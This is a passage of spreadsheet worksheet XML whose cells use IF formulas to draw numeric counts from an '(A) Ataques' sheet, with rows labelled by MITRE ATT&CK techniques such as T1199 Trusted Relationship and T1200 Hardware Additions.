        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$BY45,"")</f>
        <v>13</v>
      </c>
      <c r="Y45" s="532">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",IF($U45=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z45" s="288">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!BZ45,"")</f>
        <v>62</v>
      </c>
      <c r="AA45" s="392">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!CB45,"")</f>
        <v>48</v>
      </c>
      <c r="AB45" s="4">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!CD45,"")</f>
        <v>12</v>
      </c>
      <c r="AC45" s="20">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!CE45,"")</f>
        <v>12</v>
      </c>
      <c r="AD45" s="331">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",IF(Z45=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE45" s="322">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$CF45,"")</f>
        <v>115</v>
      </c>
      <c r="AF45" s="322">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$CH45,"")</f>
        <v>85</v>
      </c>
      <c r="AG45" s="4">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$CJ45,"")</f>
        <v>21</v>
      </c>
      <c r="AH45" s="20">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$CK45,"")</f>
        <v>15</v>
      </c>
      <c r="AI45" s="287">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",IF($AE45=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ45" s="292">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$CL45,"")</f>
        <v>0</v>
      </c>
      <c r="AK45" s="322">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$CN45,"")</f>
        <v>0</v>
      </c>
      <c r="AL45" s="4">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$CP45,"")</f>
        <v>0</v>
      </c>
      <c r="AM45" s="20">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$CQ45,"")</f>
        <v>0</v>
      </c>
      <c r="AN45" s="331">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",IF($AJ45=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO45" s="322">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$CR45,"")</f>
        <v>12</v>
      </c>
      <c r="AP45" s="322">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$CT45,"")</f>
        <v>6</v>
      </c>
      <c r="AQ45" s="4">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$CV45,"")</f>
        <v>2</v>
      </c>
      <c r="AR45" s="20">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$CW45,"")</f>
        <v>6</v>
      </c>
      <c r="AS45" s="287">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",IF($AO45=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT45" s="288">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!CX45,"")</f>
        <v>57</v>
      </c>
      <c r="AU45" s="392">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!CZ45,"")</f>
        <v>41</v>
      </c>
      <c r="AV45" s="4">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!DB45,"")</f>
        <v>10</v>
      </c>
      <c r="AW45" s="20">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!DC45,"")</f>
        <v>13</v>
      </c>
      <c r="AX45" s="331">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",IF($AT45=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY45" s="469">
        <f>'(A) Ataques'!LU45+'(A) Ataques'!MA45+'(A) Ataques'!MG45+'(A) Ataques'!MM45+'(A) Ataques'!MS45</f>
        <v>13</v>
      </c>
      <c r="AZ45" s="510">
        <f>'(A) Ataques'!LW45+'(A) Ataques'!MC45+'(A) Ataques'!MI45+'(A) Ataques'!MO45+'(A) Ataques'!MU45</f>
        <v>11</v>
      </c>
      <c r="BA45" s="471">
        <f>'(A) Ataques'!LY45+'(A) Ataques'!ME45+'(A) Ataques'!MK45+'(A) Ataques'!MQ45+'(A) Ataques'!MW45</f>
        <v>3</v>
      </c>
      <c r="BB45" s="471">
        <f>'(A) Ataques'!LQ45</f>
        <v>10</v>
      </c>
      <c r="BC45" s="331">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",IF($AY45=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD45" s="469">
        <f>IF('(A) Ataques'!$AP45&lt;&gt;"NO",'(A) Ataques'!LL45,"")</f>
        <v>40</v>
      </c>
      <c r="BE45" s="510">
        <f>IF('(A) Ataques'!$AP45&lt;&gt;"NO",'(A) Ataques'!LM45,"")</f>
        <v>34</v>
      </c>
      <c r="BF45" s="471">
        <f>IF('(A) Ataques'!$AP45&lt;&gt;"NO",'(A) Ataques'!LN45,"")</f>
        <v>3</v>
      </c>
      <c r="BG45" s="471">
        <f>IF('(A) Ataques'!$AP45&lt;&gt;"NO",'(A) Ataques'!LO45,"")</f>
        <v>7</v>
      </c>
      <c r="BH45" s="471">
        <f>IF('(A) Ataques'!$AP45&lt;&gt;"NO",'(A) Ataques'!LS45,"")</f>
        <v>25</v>
      </c>
      <c r="BI45" s="331">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",IF($BD45=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ45" s="469">
        <f>'(A) Ataques'!OL45+'(A) Ataques'!OR45+'(A) Ataques'!OX45+'(A) Ataques'!PD45+'(A) Ataques'!PJ45</f>
        <v>8</v>
      </c>
      <c r="BK45" s="510">
        <f>'(A) Ataques'!ON45+'(A) Ataques'!OT45+'(A) Ataques'!OZ45+'(A) Ataques'!PF45+'(A) Ataques'!PL45</f>
        <v>8</v>
      </c>
      <c r="BL45" s="471">
        <f>'(A) Ataques'!OP45+'(A) Ataques'!OV45+'(A) Ataques'!PB45+'(A) Ataques'!PH45+'(A) Ataques'!PN45</f>
        <v>1</v>
      </c>
      <c r="BM45" s="495">
        <f>'(A) Ataques'!OH45</f>
        <v>8</v>
      </c>
      <c r="BN45" s="331">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",IF($BJ45=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO45" s="469">
        <f>IF('(A) Ataques'!$AP45&lt;&gt;"NO",'(A) Ataques'!OC45,"")</f>
        <v>8</v>
      </c>
      <c r="BP45" s="510">
        <f>IF('(A) Ataques'!$AP45&lt;&gt;"NO",'(A) Ataques'!OD45,"")</f>
        <v>8</v>
      </c>
      <c r="BQ45" s="471">
        <f>IF('(A) Ataques'!$AP45&lt;&gt;"NO",'(A) Ataques'!OE45,"")</f>
        <v>1</v>
      </c>
      <c r="BR45" s="471">
        <f>IF('(A) Ataques'!$AP45&lt;&gt;"NO",'(A) Ataques'!OF45,"")</f>
        <v>1</v>
      </c>
      <c r="BS45" s="471">
        <f>IF('(A) Ataques'!$AP45&lt;&gt;"NO",'(A) Ataques'!OJ45,"")</f>
        <v>8</v>
      </c>
      <c r="BT45" s="331">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",IF($BO45=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A46" s="79">
        <f t="shared" si="0"/>
        <v>44</v>
      </c>
      <c r="B46" s="4">
        <f>IF('(A) Ataques'!AK46&lt;&gt;"NO",'(A) Ataques'!E46,"")</f>
        <v>34</v>
      </c>
      <c r="C46" s="6" t="str">
        <f>IF('(A) Ataques'!AK46&lt;&gt;"NO",IF('(A) Ataques'!M46="","",'(A) Ataques'!M46),"")</f>
        <v>T1199-Trusted_relationship</v>
      </c>
      <c r="D46" s="4" t="str">
        <f>IF('(A) Ataques'!AK46&lt;&gt;"NO",'(A) Ataques'!F46,"")</f>
        <v>T1199</v>
      </c>
      <c r="E46" s="286">
        <f>IF('(A) Ataques'!AK46&lt;&gt;"NO",'(A) Ataques'!AQ46,"")</f>
        <v>18</v>
      </c>
      <c r="F46" s="288">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!BB46,"")</f>
        <v>6</v>
      </c>
      <c r="G46" s="392">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!BD46,"")</f>
        <v>1</v>
      </c>
      <c r="H46" s="4">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!BF46,"")</f>
        <v>1</v>
      </c>
      <c r="I46" s="20">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!BG46,"")</f>
        <v>1</v>
      </c>
      <c r="J46" s="530">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",IF($F46=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K46" s="322">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$BH46,"")</f>
        <v>2</v>
      </c>
      <c r="L46" s="322">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$BJ46,"")</f>
        <v>2</v>
      </c>
      <c r="M46" s="4">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$BL46,"")</f>
        <v>1</v>
      </c>
      <c r="N46" s="20">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$BM46,"")</f>
        <v>2</v>
      </c>
      <c r="O46" s="532">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",IF($K46=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P46" s="292">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$BN46,"")</f>
        <v>8</v>
      </c>
      <c r="Q46" s="322">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$BP46,"")</f>
        <v>3</v>
      </c>
      <c r="R46" s="4">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$BR46,"")</f>
        <v>2</v>
      </c>
      <c r="S46" s="20">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$BS46,"")</f>
        <v>2</v>
      </c>
      <c r="T46" s="530">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",IF($P46=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U46" s="322">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$BT46,"")</f>
        <v>9</v>
      </c>
      <c r="V46" s="322">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$BV46,"")</f>
        <v>4</v>
      </c>
      <c r="W46" s="4">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$BX46,"")</f>
        <v>3</v>
      </c>
      <c r="X46" s="20">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$BY46,"")</f>
        <v>3</v>
      </c>
      <c r="Y46" s="532">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",IF($U46=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z46" s="288">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!BZ46,"")</f>
        <v>17</v>
      </c>
      <c r="AA46" s="392">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!CB46,"")</f>
        <v>17</v>
      </c>
      <c r="AB46" s="4">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!CD46,"")</f>
        <v>11</v>
      </c>
      <c r="AC46" s="20">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!CE46,"")</f>
        <v>5</v>
      </c>
      <c r="AD46" s="331">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",IF(Z46=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE46" s="322">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$CF46,"")</f>
        <v>26</v>
      </c>
      <c r="AF46" s="322">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$CH46,"")</f>
        <v>21</v>
      </c>
      <c r="AG46" s="4">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$CJ46,"")</f>
        <v>14</v>
      </c>
      <c r="AH46" s="20">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$CK46,"")</f>
        <v>5</v>
      </c>
      <c r="AI46" s="287">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",IF($AE46=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ46" s="292">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$CL46,"")</f>
        <v>0</v>
      </c>
      <c r="AK46" s="322">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$CN46,"")</f>
        <v>0</v>
      </c>
      <c r="AL46" s="4">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$CP46,"")</f>
        <v>0</v>
      </c>
      <c r="AM46" s="20">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$CQ46,"")</f>
        <v>0</v>
      </c>
      <c r="AN46" s="331">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",IF($AJ46=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO46" s="322">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$CR46,"")</f>
        <v>3</v>
      </c>
      <c r="AP46" s="322">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$CT46,"")</f>
        <v>3</v>
      </c>
      <c r="AQ46" s="4">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$CV46,"")</f>
        <v>2</v>
      </c>
      <c r="AR46" s="20">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!$CW46,"")</f>
        <v>3</v>
      </c>
      <c r="AS46" s="287">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",IF($AO46=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT46" s="288">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!CX46,"")</f>
        <v>11</v>
      </c>
      <c r="AU46" s="392">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!CZ46,"")</f>
        <v>6</v>
      </c>
      <c r="AV46" s="4">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!DB46,"")</f>
        <v>4</v>
      </c>
      <c r="AW46" s="20">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",'(A) Ataques'!DC46,"")</f>
        <v>3</v>
      </c>
      <c r="AX46" s="331">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",IF($AT46=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY46" s="469">
        <f>'(A) Ataques'!LU46+'(A) Ataques'!MA46+'(A) Ataques'!MG46+'(A) Ataques'!MM46+'(A) Ataques'!MS46</f>
        <v>1</v>
      </c>
      <c r="AZ46" s="510">
        <f>'(A) Ataques'!LW46+'(A) Ataques'!MC46+'(A) Ataques'!MI46+'(A) Ataques'!MO46+'(A) Ataques'!MU46</f>
        <v>1</v>
      </c>
      <c r="BA46" s="471">
        <f>'(A) Ataques'!LY46+'(A) Ataques'!ME46+'(A) Ataques'!MK46+'(A) Ataques'!MQ46+'(A) Ataques'!MW46</f>
        <v>1</v>
      </c>
      <c r="BB46" s="471">
        <f>'(A) Ataques'!LQ46</f>
        <v>1</v>
      </c>
      <c r="BC46" s="331">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",IF($AY46=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD46" s="469">
        <f>IF('(A) Ataques'!$AP46&lt;&gt;"NO",'(A) Ataques'!LL46,"")</f>
        <v>11</v>
      </c>
      <c r="BE46" s="510">
        <f>IF('(A) Ataques'!$AP46&lt;&gt;"NO",'(A) Ataques'!LM46,"")</f>
        <v>11</v>
      </c>
      <c r="BF46" s="471">
        <f>IF('(A) Ataques'!$AP46&lt;&gt;"NO",'(A) Ataques'!LN46,"")</f>
        <v>1</v>
      </c>
      <c r="BG46" s="471">
        <f>IF('(A) Ataques'!$AP46&lt;&gt;"NO",'(A) Ataques'!LO46,"")</f>
        <v>4</v>
      </c>
      <c r="BH46" s="471">
        <f>IF('(A) Ataques'!$AP46&lt;&gt;"NO",'(A) Ataques'!LS46,"")</f>
        <v>10</v>
      </c>
      <c r="BI46" s="331">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",IF($BD46=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ46" s="469">
        <f>'(A) Ataques'!OL46+'(A) Ataques'!OR46+'(A) Ataques'!OX46+'(A) Ataques'!PD46+'(A) Ataques'!PJ46</f>
        <v>0</v>
      </c>
      <c r="BK46" s="510">
        <f>'(A) Ataques'!ON46+'(A) Ataques'!OT46+'(A) Ataques'!OZ46+'(A) Ataques'!PF46+'(A) Ataques'!PL46</f>
        <v>0</v>
      </c>
      <c r="BL46" s="471">
        <f>'(A) Ataques'!OP46+'(A) Ataques'!OV46+'(A) Ataques'!PB46+'(A) Ataques'!PH46+'(A) Ataques'!PN46</f>
        <v>0</v>
      </c>
      <c r="BM46" s="495">
        <f>'(A) Ataques'!OH46</f>
        <v>0</v>
      </c>
      <c r="BN46" s="331">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",IF($BJ46=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO46" s="469">
        <f>IF('(A) Ataques'!$AP46&lt;&gt;"NO",'(A) Ataques'!OC46,"")</f>
        <v>0</v>
      </c>
      <c r="BP46" s="510">
        <f>IF('(A) Ataques'!$AP46&lt;&gt;"NO",'(A) Ataques'!OD46,"")</f>
        <v>0</v>
      </c>
      <c r="BQ46" s="471">
        <f>IF('(A) Ataques'!$AP46&lt;&gt;"NO",'(A) Ataques'!OE46,"")</f>
        <v>0</v>
      </c>
      <c r="BR46" s="471">
        <f>IF('(A) Ataques'!$AP46&lt;&gt;"NO",'(A) Ataques'!OF46,"")</f>
        <v>0</v>
      </c>
      <c r="BS46" s="471">
        <f>IF('(A) Ataques'!$AP46&lt;&gt;"NO",'(A) Ataques'!OJ46,"")</f>
        <v>0</v>
      </c>
      <c r="BT46" s="331">
        <f>IF('(A) Ataques'!$AK46&lt;&gt;"NO",IF($BO46=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A47" s="79">
        <f t="shared" si="0"/>
        <v>45</v>
      </c>
      <c r="B47" s="4">
        <f>IF('(A) Ataques'!AK47&lt;&gt;"NO",'(A) Ataques'!E47,"")</f>
        <v>35</v>
      </c>
      <c r="C47" s="6" t="str">
        <f>IF('(A) Ataques'!AK47&lt;&gt;"NO",IF('(A) Ataques'!M47="","",'(A) Ataques'!M47),"")</f>
        <v>T1200-Hardware_Additions</v>
      </c>
      <c r="D47" s="4" t="str">
        <f>IF('(A) Ataques'!AK47&lt;&gt;"NO",'(A) Ataques'!F47,"")</f>
        <v>T1200</v>
      </c>
      <c r="E47" s="286">
        <f>IF('(A) Ataques'!AK47&lt;&gt;"NO",'(A) Ataques'!AQ47,"")</f>
        <v>3</v>
      </c>
      <c r="F47" s="288">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!BB47,"")</f>
        <v>6</v>
      </c>
      <c r="G47" s="392">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!BD47,"")</f>
        <v>1</v>
      </c>
      <c r="H47" s="4">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!BF47,"")</f>
        <v>1</v>
      </c>
      <c r="I47" s="20">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!BG47,"")</f>
        <v>1</v>
      </c>
      <c r="J47" s="530">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",IF($F47=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K47" s="322">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$BH47,"")</f>
        <v>0</v>
      </c>
      <c r="L47" s="322">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$BJ47,"")</f>
        <v>0</v>
      </c>
      <c r="M47" s="4">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$BL47,"")</f>
        <v>0</v>
      </c>
      <c r="N47" s="20">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$BM47,"")</f>
        <v>0</v>
      </c>
      <c r="O47" s="532">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",IF($K47=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P47" s="292">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$BN47,"")</f>
        <v>6</v>
      </c>
      <c r="Q47" s="322">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$BP47,"")</f>
        <v>1</v>
      </c>
      <c r="R47" s="4">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$BR47,"")</f>
        <v>1</v>
      </c>
      <c r="S47" s="20">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$BS47,"")</f>
        <v>1</v>
      </c>
      <c r="T47" s="530">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",IF($P47=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U47" s="322">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$BT47,"")</f>
        <v>7</v>
      </c>
      <c r="V47" s="322">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$BV47,"")</f>
        <v>2</v>
      </c>
      <c r="W47" s="4">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$BX47,"")</f>
        <v>2</v>
      </c>
      <c r="X47" s="20">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$BY47,"")</f>
        <v>1</v>
      </c>
      <c r="Y47" s="532">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",IF($U47=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z47" s="288">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!BZ47,"")</f>
        <v>11</v>
      </c>
      <c r="AA47" s="392">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!CB47,"")</f>
        <v>4</v>
      </c>
      <c r="AB47" s="4">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!CD47,"")</f>
        <v>4</v>
      </c>
      <c r="AC47" s="20">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!CE47,"")</f>
        <v>2</v>
      </c>
      <c r="AD47" s="331">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",IF(Z47=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE47" s="322">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$CF47,"")</f>
        <v>18</v>
      </c>
      <c r="AF47" s="322">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$CH47,"")</f>
        <v>6</v>
      </c>
      <c r="AG47" s="4">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$CJ47,"")</f>
        <v>6</v>
      </c>
      <c r="AH47" s="20">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$CK47,"")</f>
        <v>2</v>
      </c>
      <c r="AI47" s="287">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",IF($AE47=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ47" s="292">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$CL47,"")</f>
        <v>0</v>
      </c>
      <c r="AK47" s="322">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$CN47,"")</f>
        <v>0</v>
      </c>
      <c r="AL47" s="4">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$CP47,"")</f>
        <v>0</v>
      </c>
      <c r="AM47" s="20">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$CQ47,"")</f>
        <v>0</v>
      </c>
      <c r="AN47" s="331">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",IF($AJ47=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO47" s="322">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$CR47,"")</f>
        <v>1</v>
      </c>
      <c r="AP47" s="322">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$CT47,"")</f>
        <v>1</v>
      </c>
      <c r="AQ47" s="4">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$CV47,"")</f>
        <v>1</v>
      </c>
      <c r="AR47" s="20">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!$CW47,"")</f>
        <v>1</v>
      </c>
      <c r="AS47" s="287">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",IF($AO47=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT47" s="288">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!CX47,"")</f>
        <v>7</v>
      </c>
      <c r="AU47" s="392">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!CZ47,"")</f>
        <v>2</v>
      </c>
      <c r="AV47" s="4">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!DB47,"")</f>
        <v>2</v>
      </c>
      <c r="AW47" s="20">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",'(A) Ataques'!DC47,"")</f>
        <v>1</v>
      </c>
      <c r="AX47" s="331">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",IF($AT47=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY47" s="469">
        <f>'(A) Ataques'!LU47+'(A) Ataques'!MA47+'(A) Ataques'!MG47+'(A) Ataques'!MM47+'(A) Ataques'!MS47</f>
        <v>1</v>
      </c>
      <c r="AZ47" s="510">
        <f>'(A) Ataques'!LW47+'(A) Ataques'!MC47+'(A) Ataques'!MI47+'(A) Ataques'!MO47+'(A) Ataques'!MU47</f>
        <v>1</v>
      </c>
      <c r="BA47" s="471">
        <f>'(A) Ataques'!LY47+'(A) Ataques'!ME47+'(A) Ataques'!MK47+'(A) Ataques'!MQ47+'(A) Ataques'!MW47</f>
        <v>1</v>
      </c>
      <c r="BB47" s="471">
        <f>'(A) Ataques'!LQ47</f>
        <v>1</v>
      </c>
      <c r="BC47" s="331">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",IF($AY47=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD47" s="469">
        <f>IF('(A) Ataques'!$AP47&lt;&gt;"NO",'(A) Ataques'!LL47,"")</f>
        <v>5</v>
      </c>
      <c r="BE47" s="510">
        <f>IF('(A) Ataques'!$AP47&lt;&gt;"NO",'(A) Ataques'!LM47,"")</f>
        <v>5</v>
      </c>
      <c r="BF47" s="471">
        <f>IF('(A) Ataques'!$AP47&lt;&gt;"NO",'(A) Ataques'!LN47,"")</f>
        <v>1</v>
      </c>
      <c r="BG47" s="471">
        <f>IF('(A) Ataques'!$AP47&lt;&gt;"NO",'(A) Ataques'!LO47,"")</f>
        <v>4</v>
      </c>
      <c r="BH47" s="471">
        <f>IF('(A) Ataques'!$AP47&lt;&gt;"NO",'(A) Ataques'!LS47,"")</f>
        <v>3</v>
      </c>
      <c r="BI47" s="331">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",IF($BD47=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ47" s="469">
        <f>'(A) Ataques'!OL47+'(A) Ataques'!OR47+'(A) Ataques'!OX47+'(A) Ataques'!PD47+'(A) Ataques'!PJ47</f>
        <v>1</v>
      </c>
      <c r="BK47" s="510">
